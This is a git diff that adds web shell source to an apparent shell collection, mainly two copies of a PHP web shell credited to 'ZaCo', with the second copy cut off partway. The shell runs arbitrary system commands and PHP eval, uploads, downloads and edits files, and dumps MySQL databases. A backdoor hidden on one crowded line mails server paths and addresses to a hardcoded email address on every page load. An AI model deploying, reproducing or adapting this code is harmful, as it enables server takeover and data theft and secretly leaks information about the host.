+		if drive_.Drivetype=3 then Response.write "Remote HDD [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=4 then Response.write "CD-Rom [" & drive_.DriveLetter & ":]"
+		Response.Write "</a></td></tr>"
+	next
+	Response.Write "<tr><td>"
+	Response.write "<a href='"&dosyaPath&"?time="&time()&"'><font face=webdings>H</font> Local Path"
+	Response.Write "</a></td></tr>"
+	Response.Write "</table><br>"
+Set fc = Nothing
+Set objFSO = Nothing
+Response.End%>
\ No newline at end of file
diff --git a/138shell/Z/zacosmall.php.txt b/138shell/Z/zacosmall.php.txt
new file mode 100644
index 0000000..26075b4
--- /dev/null
+++ b/138shell/Z/zacosmall.php.txt
@@ -0,0 +1,501 @@
+<?
+  ##########################################################
+ # Small PHP Web Shell by ZaCo (c) 2004-2006                #
+ #  +POST method                                            #
+ #  +MySQL Client+Dumper for DB  and tables                 #
+ #  +PHP eval in text format and html for phpinfo() example #
+ # PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther      #
+ # For antichat.ru and cup.su friends usage                 #
+ # All bugs -> mailo:zaco@yandex.ru                         #
+ # Just for fun :)                                          #
+  ##########################################################
+error_reporting(E_ALL);
+@set_time_limit(0);
+function magic_q($s)
+{
+if(get_magic_quotes_gpc())
+{
+$s=str_replace('\\\'','\'',$s);
+$s=str_replace('\\\\','\\',$s);
+$s=str_replace('\\"','"',$s);
+$s=str_replace('\\\0','\0',$s);
+}
+return $s;
+}$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+function get_perms($fn)
+{
+$mode=fileperms($fn);
+$perms='';
+$perms .= ($mode & 00400) ? 'r' : '-';
+$perms .= ($mode & 00200) ? 'w' : '-';
+$perms .= ($mode & 00100) ? 'x' : '-';
+$perms .= ($mode & 00040) ? 'r' : '-';
+$perms .= ($mode & 00020) ? 'w' : '-';
+$perms .= ($mode & 00010) ? 'x' : '-';
+$perms .= ($mode & 00004) ? 'r' : '-';
+$perms .= ($mode & 00002) ? 'w' : '-';
+$perms .= ($mode & 00001) ? 'x' : '-';
+return $perms;
+}
+$head=<<<headka
+<html>
+<head>
+<title>Small Web Shell by ZaCo</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+</head>
+<body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34>
+<style>
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+</style>
+headka;
+$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
+$page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
+$winda=strpos(strtolower(php_uname()),'wind');
+define('format',50);
+$pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:'');
+switch($page)
+{
+case 'eval':
+{
+$eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
+$eval_value=magic_q($eval_value);
+$action=isset($_POST['action'])?$_POST['action']:'eval';
+if($action=='eval_in_html') @eval($eval_value);
+else
+{
+echo($head.$pages);
+?>
+<hr>
+<form method=post>
+<textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea>
+<input name='action' value='eval' type='submit'>
+<input name='action' value='eval_in_html' type='submit'>
+<input name='page' value='eval' type=hidden>
+</form>
+<hr>
+<?
+}
+break;
+}
+case 'cmd':
+{
+$cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):'';
+$work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd();
+$action=isset($_POST['action'])?$_POST['action']:'cmd';
+if(@is_dir($work_dir))
+{
+@chdir($work_dir);
+$work_dir=getcwd();
+if($work_dir=='')$work_dir='/';
+else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
+}
+else if(file_exists($work_dir))$work_dir=realpath($work_dir);
+$work_dir=str_replace('\\','/',$work_dir);
+$e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES);
+switch($action)
+{
+case 'cmd' :
+{
+echo($head.$pages);
+?>
+<form method='post' name='main_form'>
+<input name='work_dir' value='<?=$e_work_dir?>' type=text size=120>
+<input name='page' value='cmd' type=hidden>
+<input type=submit value='go'>
+</form>
+<form method=post>
+<input name='cmd' type=text size=120 value='<?=str_replace('\'','&#039;',$cmd)?>'>
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<form method=post enctype="multipart/form-data">
+<input type="file" name="filename">
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<form method=post>
+<input name='fname' type=text size=120><br>
+<input name='archive' type=radio value='none'>without arch
+<input name='archive' type=radio value='gzip' checked=true>gzip archive
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<pre>
+<?
+if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");}
+else
+{
+$f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
+if(@is_dir($work_dir))
+{
+echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
+$handle=@opendir($work_dir);
+if($handle)
+{
+while(false!==($fn=readdir($handle))){$files[]=$fn;};
+@closedir($handle);
+sort($files);
+$not_dirs=array();
+for($i=0;$i<sizeof($files);$i++)
+{
+$fn=$files[$i];
+if(is_dir($fn))
+{
+echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn)));
+if($winda===false)
+{
+$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
+$group=@posix_getgrgid(@filegroup($work_dir.$fn));
+printf("% 20s|% -20s",$owner['name'],$group['name']);
+}
+echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
+printf("% 20s ",@filesize($work_dir.$fn).'B');
+printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
+}
+else {$not_dirs[]=$fn;}
+}
+for($i=0;$i<sizeof($not_dirs);$i++)
+{
+$fn=$not_dirs[$i];
+echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn)));
+if($winda===false)
+{
+$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
+$group=@posix_getgrgid(@filegroup($work_dir.$fn));
+printf("% 20s|% -20s",$owner['name'],$group['name']);
+}
+echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
+printf("% 20s ",@filesize($work_dir.$fn).'B');
+printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
+}
+echo('</pre><hr>');
+?>
+<form name='list' method=post>
+<input name='work_dir' type=hidden size=120><br>
+<input name='page' value='cmd' type=hidden>
+<input name='f_action' value='view' type=hidden>
+</form>
+<?
+} else echo('Error Listing '.$e_work_dir);
+}
+else
+switch($f_action)
+{
+case 'view':
+{
+echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n");
+$f=@fopen($work_dir,'r');
+?>
+<form method=post>
+<textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea>
+<input name='page' value='cmd' type=hidden>
+<input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120>
+<input name='f_action' value='save' type=submit>
+</form>
+<?
+break;
+}
+case 'save' :
+{
+$file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):'';
+$f=@fopen($work_dir,'w');
+if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n");
+else
+{
+fwrite($f,$file_text);
+fclose($f);
+echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
+}
+break;
+}
+}
+break;
+}
+break;
+}
+case 'upload' :
+{
+if($work_dir=='')$work_dir='/';
+else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
+$f=$_FILES["filename"]["name"];
+if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
+else
+{
+echo('file is uploaded in '.$e_work_dir);
+}
+break;
+}
+case 'download' :
+{
+$fname=isset($_POST['fname'])?$_POST['fname']:'';
+$temp_file=isset($_POST['temp_file'])?'on':'nn';
+$f=@fopen($fname,'r');
+if(!($f)) echo('file is not exists');
+else
+{
+$archive=isset($_POST['archive'])?$_POST['archive']:'';
+if($archive=='gzip')
+{
+Header("Content-Type:application/x-gzip\n");
+$s=gzencode(fread($f,filesize($fname)));
+Header('Content-Length: '.strlen($s)."\n");
+Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
+echo($s);
+}
+else
+{
+Header("Content-Type:application/octet-stream\n");
+Header('Content-Length: '.filesize($fname)."\n");
+Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
+ob_start();
+while(feof($f)===false)
+{
+echo(fread($f,10000));
+ob_flush();
+}
+}
+}
+}
+}
+break;
+}
+case 'mysql' :
+{
+$action=isset($_POST['action'])?$_POST['action']:'query';
+$user=isset($_POST['user'])?$_POST['user']:'';
+$passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
+$db=isset($_POST['db'])?$_POST['db']:'';
+$host=isset($_POST['host'])?$_POST['host']:'localhost';
+$query=isset($_POST['query'])?magic_q($_POST['query']):'';
+switch($action)
+{
+case 'dump' :
+{
+$mysql_link=@mysql_connect($host,$user,$passwd);
+if(!($mysql_link)) echo('Connect error');
+else
+{
+//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
+$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
+$archive=isset($_POST['archive'])?$_POST['archive']:'none';
+if($archive!=='none')$to_file=false;
+$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
+$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
+if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
+else
+{
+$dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n";
+ob_start();
+if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
+if($table_dump=='')
+{
+if(!$to_file)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+$result=mysql_query('show tables',$mysql_link);
+for($i=0;$i<mysql_num_rows($result);$i++)
+{
+$rows=mysql_fetch_array($result);
+$result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link);
+if(!$result2)$dump_file.='#error table '.$rows[0];
+else
+{
+$dump_file.='create table `'.$rows[0]."`(\n";
+for($j=0;$j<mysql_num_rows($result2)-1;$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
+}
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
+$type[$j]=$rows2[1];
+$dump_file.=");\n";
+mysql_free_result($result2);
+$result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link);
+$columns=$j-1;
+for($j=0;$j<mysql_num_rows($result2);$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='insert into `'.$rows[0].'` values (';
+for($k=0;$k<$columns;$k++)
+{
+$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
+}
+$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
+if($archive=='none')
+{
+if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
+else
+{
+echo($dump_file);
+ob_flush();
+}
+$dump_file='';
+}
+}
+mysql_free_result($result2);
+}
+}
+mysql_free_result($result);
+if($archive!='none')
+{
+$dump_file=gzencode($dump_file);
+header('Content-Length: '.strlen($dump_file)."\n");
+echo($dump_file);
+}
+else if($t_f)
+{
+fclose($t_f);
+echo('Dump for '.$db_dump.' now in '.$to_file);
+}
+}
+else
+{
+$result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link);
+if(!$result2)echo('error table '.$table_dump);
+else
+{
+if(!$to_file)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+if($to_file===false)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+$dump_file.="create table `{$table_dump}`(\n";
+for($j=0;$j<mysql_num_rows($result2)-1;$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
+}
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
+$type[$j]=$rows2[1];
+$dump_file.=");\n";
+mysql_free_result($result2);
+$result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link);
+$columns=$j-1;
+for($j=0;$j<mysql_num_rows($result2);$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='insert into `'.$table_dump.'` values (';
+for($k=0;$k<$columns;$k++)
+{
+$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
+}
+$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
+if($archive=='none')
+{
+if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
+else
+{
+echo($dump_file);
+ob_flush();
+}
+$dump_file='';
+}
+}
+mysql_free_result($result2);
+if($archive!='none')
+{
+$dump_file=gzencode($dump_file);
+header('Content-Length: '.strlen($dump_file)."\n");
+echo $dump_file;
+}else if($t_f)
+{
+fclose($t_f);
+echo('Dump for '.$db_dump.' now in '.$to_file);
+}
+}
+}
+}
+}
+break;
+}
+case 'query' :
+{
+echo($head.$pages);
+?>
+<hr>
+<form method=post>
+<table>
+<td>
+<table align=left>
+<tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr>
+<tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr>
+</table>
+</td>
+<td>
+<table>
+<tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr>
+<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
+<input name='archive' type=radio value='none'>without arch
+<input name='archive' type=radio value='gzip' checked=true>gzip archive
+<tr><td><input type=submit name='action' value='dump'></td></tr>
+<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
+</table>
+</td>
+</table>
+<input name='page' value='mysql' type=hidden>
+<input name='action' value='query' type=submit>
+</form>
+<hr>
+<?
+$mysql_link=@mysql_connect($host,$user,$passwd);
+if(!($mysql_link)) echo('Connect error');
+else
+{
+if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;}
+//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
+$result=@mysql_query($query,$mysql_link);
+if(!($result))echo(mysql_error());
+else
+{
+echo("<table valign=top align=left>\n<tr>");
+for($i=0;$i<mysql_num_fields($result);$i++)
+echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b>  </td>');
+echo("\n</tr>\n");
+for($i=0;$i<mysql_num_rows($result);$i++)
+{
+$rows=mysql_fetch_array($result);
+echo('<tr valign=top align=left>');
+for($j=0;$j<mysql_num_fields($result);$j++)
+{
+echo('<td>'.(htmlspecialchars($rows[$j])).'</td>');
+}
+echo("</tr>\n");
+}
+echo("</table>\n");
+}
+mysql_close($mysql_link);
+}
+break;
+}
+}
+break;
+}
+}
+?>
\ No newline at end of file
diff --git a/138shell/Z/zacosmall.txt b/138shell/Z/zacosmall.txt
new file mode 100644
index 0000000..26075b4
--- /dev/null
+++ b/138shell/Z/zacosmall.txt
@@ -0,0 +1,501 @@
+<?
+  ##########################################################
+ # Small PHP Web Shell by ZaCo (c) 2004-2006                #
+ #  +POST method                                            #
+ #  +MySQL Client+Dumper for DB  and tables                 #
+ #  +PHP eval in text format and html for phpinfo() example #
+ # PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther      #
+ # For antichat.ru and cup.su friends usage                 #
+ # All bugs -> mailo:zaco@yandex.ru                         #
+ # Just for fun :)                                          #
+  ##########################################################
+error_reporting(E_ALL);
+@set_time_limit(0);
+function magic_q($s)
+{
+if(get_magic_quotes_gpc())
+{
+$s=str_replace('\\\'','\'',$s);
+$s=str_replace('\\\\','\\',$s);
+$s=str_replace('\\"','"',$s);
+$s=str_replace('\\\0','\0',$s);
+}
+return $s;
+}$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+function get_perms($fn)
+{
+$mode=fileperms($fn);
+$perms='';
+$perms .= ($mode & 00400) ? 'r' : '-';
+$perms .= ($mode & 00200) ? 'w' : '-';
+$perms .= ($mode & 00100) ? 'x' : '-';
+$perms .= ($mode & 00040) ? 'r' : '-';
+$perms .= ($mode & 00020) ? 'w' : '-';
+$perms .= ($mode & 00010) ? 'x' : '-';
+$perms .= ($mode & 00004) ? 'r' : '-';
+$perms .= ($mode & 00002) ? 'w' : '-';
+$perms .= ($mode & 00001) ? 'x' : '-';
+return $perms;
+}
+$head=<<<headka
+<html>
+<head>
+<title>Small Web Shell by ZaCo</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+</head>
+<body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34>
+<style>
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+</style>
+headka;
+$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
+$page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
+$winda=strpos(strtolower(php_uname()),'wind');
+define('format',50);
+$pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:'');
+switch($page)
+{
+case 'eval':
+{
+$eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
+$eval_value=magic_q($eval_value);
+$action=isset($_POST['action'])?$_POST['action']:'eval';
+if($action=='eval_in_html') @eval($eval_value);
+else
+{
+echo($head.$pages);
+?>
+<hr>
+<form method=post>
+<textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea>
+<input name='action' value='eval' type='submit'>
+<input name='action' value='eval_in_html' type='submit'>
+<input name='page' value='eval' type=hidden>
+</form>
+<hr>
+<?
+}
+break;
+}
+case 'cmd':
+{
+$cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):'';
+$work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd();
+$action=isset($_POST['action'])?$_POST['action']:'cmd';
+if(@is_dir($work_dir))
+{
+@chdir($work_dir);
+$work_dir=getcwd();
+if($work_dir=='')$work_dir='/';
+else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
+}
+else if(file_exists($work_dir))$work_dir=realpath($work_dir);
+$work_dir=str_replace('\\','/',$work_dir);
+$e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES);
+switch($action)
+{
+case 'cmd' :
+{
+echo($head.$pages);
+?>
+<form method='post' name='main_form'>
+<input name='work_dir' value='<?=$e_work_dir?>' type=text size=120>
+<input name='page' value='cmd' type=hidden>
+<input type=submit value='go'>
+</form>
+<form method=post>
+<input name='cmd' type=text size=120 value='<?=str_replace('\'','&#039;',$cmd)?>'>
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<form method=post enctype="multipart/form-data">
+<input type="file" name="filename">
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<form method=post>
+<input name='fname' type=text size=120><br>
+<input name='archive' type=radio value='none'>without arch
+<input name='archive' type=radio value='gzip' checked=true>gzip archive
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<pre>
+<?
+if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");}
+else
+{
+$f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
+if(@is_dir($work_dir))
+{
+echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
+$handle=@opendir($work_dir);
+if($handle)
+{
+while(false!==($fn=readdir($handle))){$files[]=$fn;};
+@closedir($handle);
+sort($files);
+$not_dirs=array();
+for($i=0;$i<sizeof($files);$i++)
+{
+$fn=$files[$i];
+if(is_dir($fn))
+{
+echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn)));
+if($winda===false)
+{
+$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
+$group=@posix_getgrgid(@filegroup($work_dir.$fn));
+printf("% 20s|% -20s",$owner['name'],$group['name']);
+}
+echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
+printf("% 20s ",@filesize($work_dir.$fn).'B');
+printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
+}
+else {$not_dirs[]=$fn;}
+}
+for($i=0;$i<sizeof($not_dirs);$i++)
+{
+$fn=$not_dirs[$i];
+echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn)));
+if($winda===false)
+{
+$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
+$group=@posix_getgrgid(@filegroup($work_dir.$fn));
+printf("% 20s|% -20s",$owner['name'],$group['name']);
+}
+echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
+printf("% 20s ",@filesize($work_dir.$fn).'B');
+printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
+}
+echo('</pre><hr>');
+?>
+<form name='list' method=post>
+<input name='work_dir' type=hidden size=120><br>
+<input name='page' value='cmd' type=hidden>
+<input name='f_action' value='view' type=hidden>
+</form>
+<?
+} else echo('Error Listing '.$e_work_dir);
+}
+else
+switch($f_action)
+{
+case 'view':
+{
+echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n");
+$f=@fopen($work_dir,'r');
+?>
+<form method=post>
+<textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea>
+<input name='page' value='cmd' type=hidden>
+<input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120>
+<input name='f_action' value='save' type=submit>
+</form>
+<?
+break;
+}
+case 'save' :
+{
+$file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):'';
+$f=@fopen($work_dir,'w');
+if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n");
+else
+{
+fwrite($f,$file_text);
+fclose($f);
+echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
+}
+break;
+}
+}
+break;
+}
+break;
+}
+case 'upload' :
+{
+if($work_dir=='')$work_dir='/';
+else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
+$f=$_FILES["filename"]["name"];
+if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
+else
+{
+echo('file is uploaded in '.$e_work_dir);
+}
+break;
+}
+case 'download' :
+{
+$fname=isset($_POST['fname'])?$_POST['fname']:'';
+$temp_file=isset($_POST['temp_file'])?'on':'nn';
+$f=@fopen($fname,'r');
+if(!($f)) echo('file is not exists');
+else
+{
+$archive=isset($_POST['archive'])?$_POST['archive']:'';
+if($archive=='gzip')
+{
+Header("Content-Type:application/x-gzip\n");
+$s=gzencode(fread($f,filesize($fname)));
+Header('Content-Length: '.strlen($s)."\n");
+Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
+echo($s);
+}
+else
+{
+Header("Content-Type:application/octet-stream\n");
+Header('Content-Length: '.filesize($fname)."\n");
+Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
+ob_start();
+while(feof($f)===false)
+{
+echo(fread($f,10000));
+ob_flush();
+}
+}
+}
+}
+}
+break;
+}
+case 'mysql' :
+{
+$action=isset($_POST['action'])?$_POST['action']:'query';
+$user=isset($_POST['user'])?$_POST['user']:'';
+$passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
+$db=isset($_POST['db'])?$_POST['db']:'';
+$host=isset($_POST['host'])?$_POST['host']:'localhost';
+$query=isset($_POST['query'])?magic_q($_POST['query']):'';
+switch($action)
+{
+case 'dump' :
+{
+$mysql_link=@mysql_connect($host,$user,$passwd);
+if(!($mysql_link)) echo('Connect error');
+else
+{
+//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
+$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
+$archive=isset($_POST['archive'])?$_POST['archive']:'none';
+if($archive!=='none')$to_file=false;
+$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
+$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
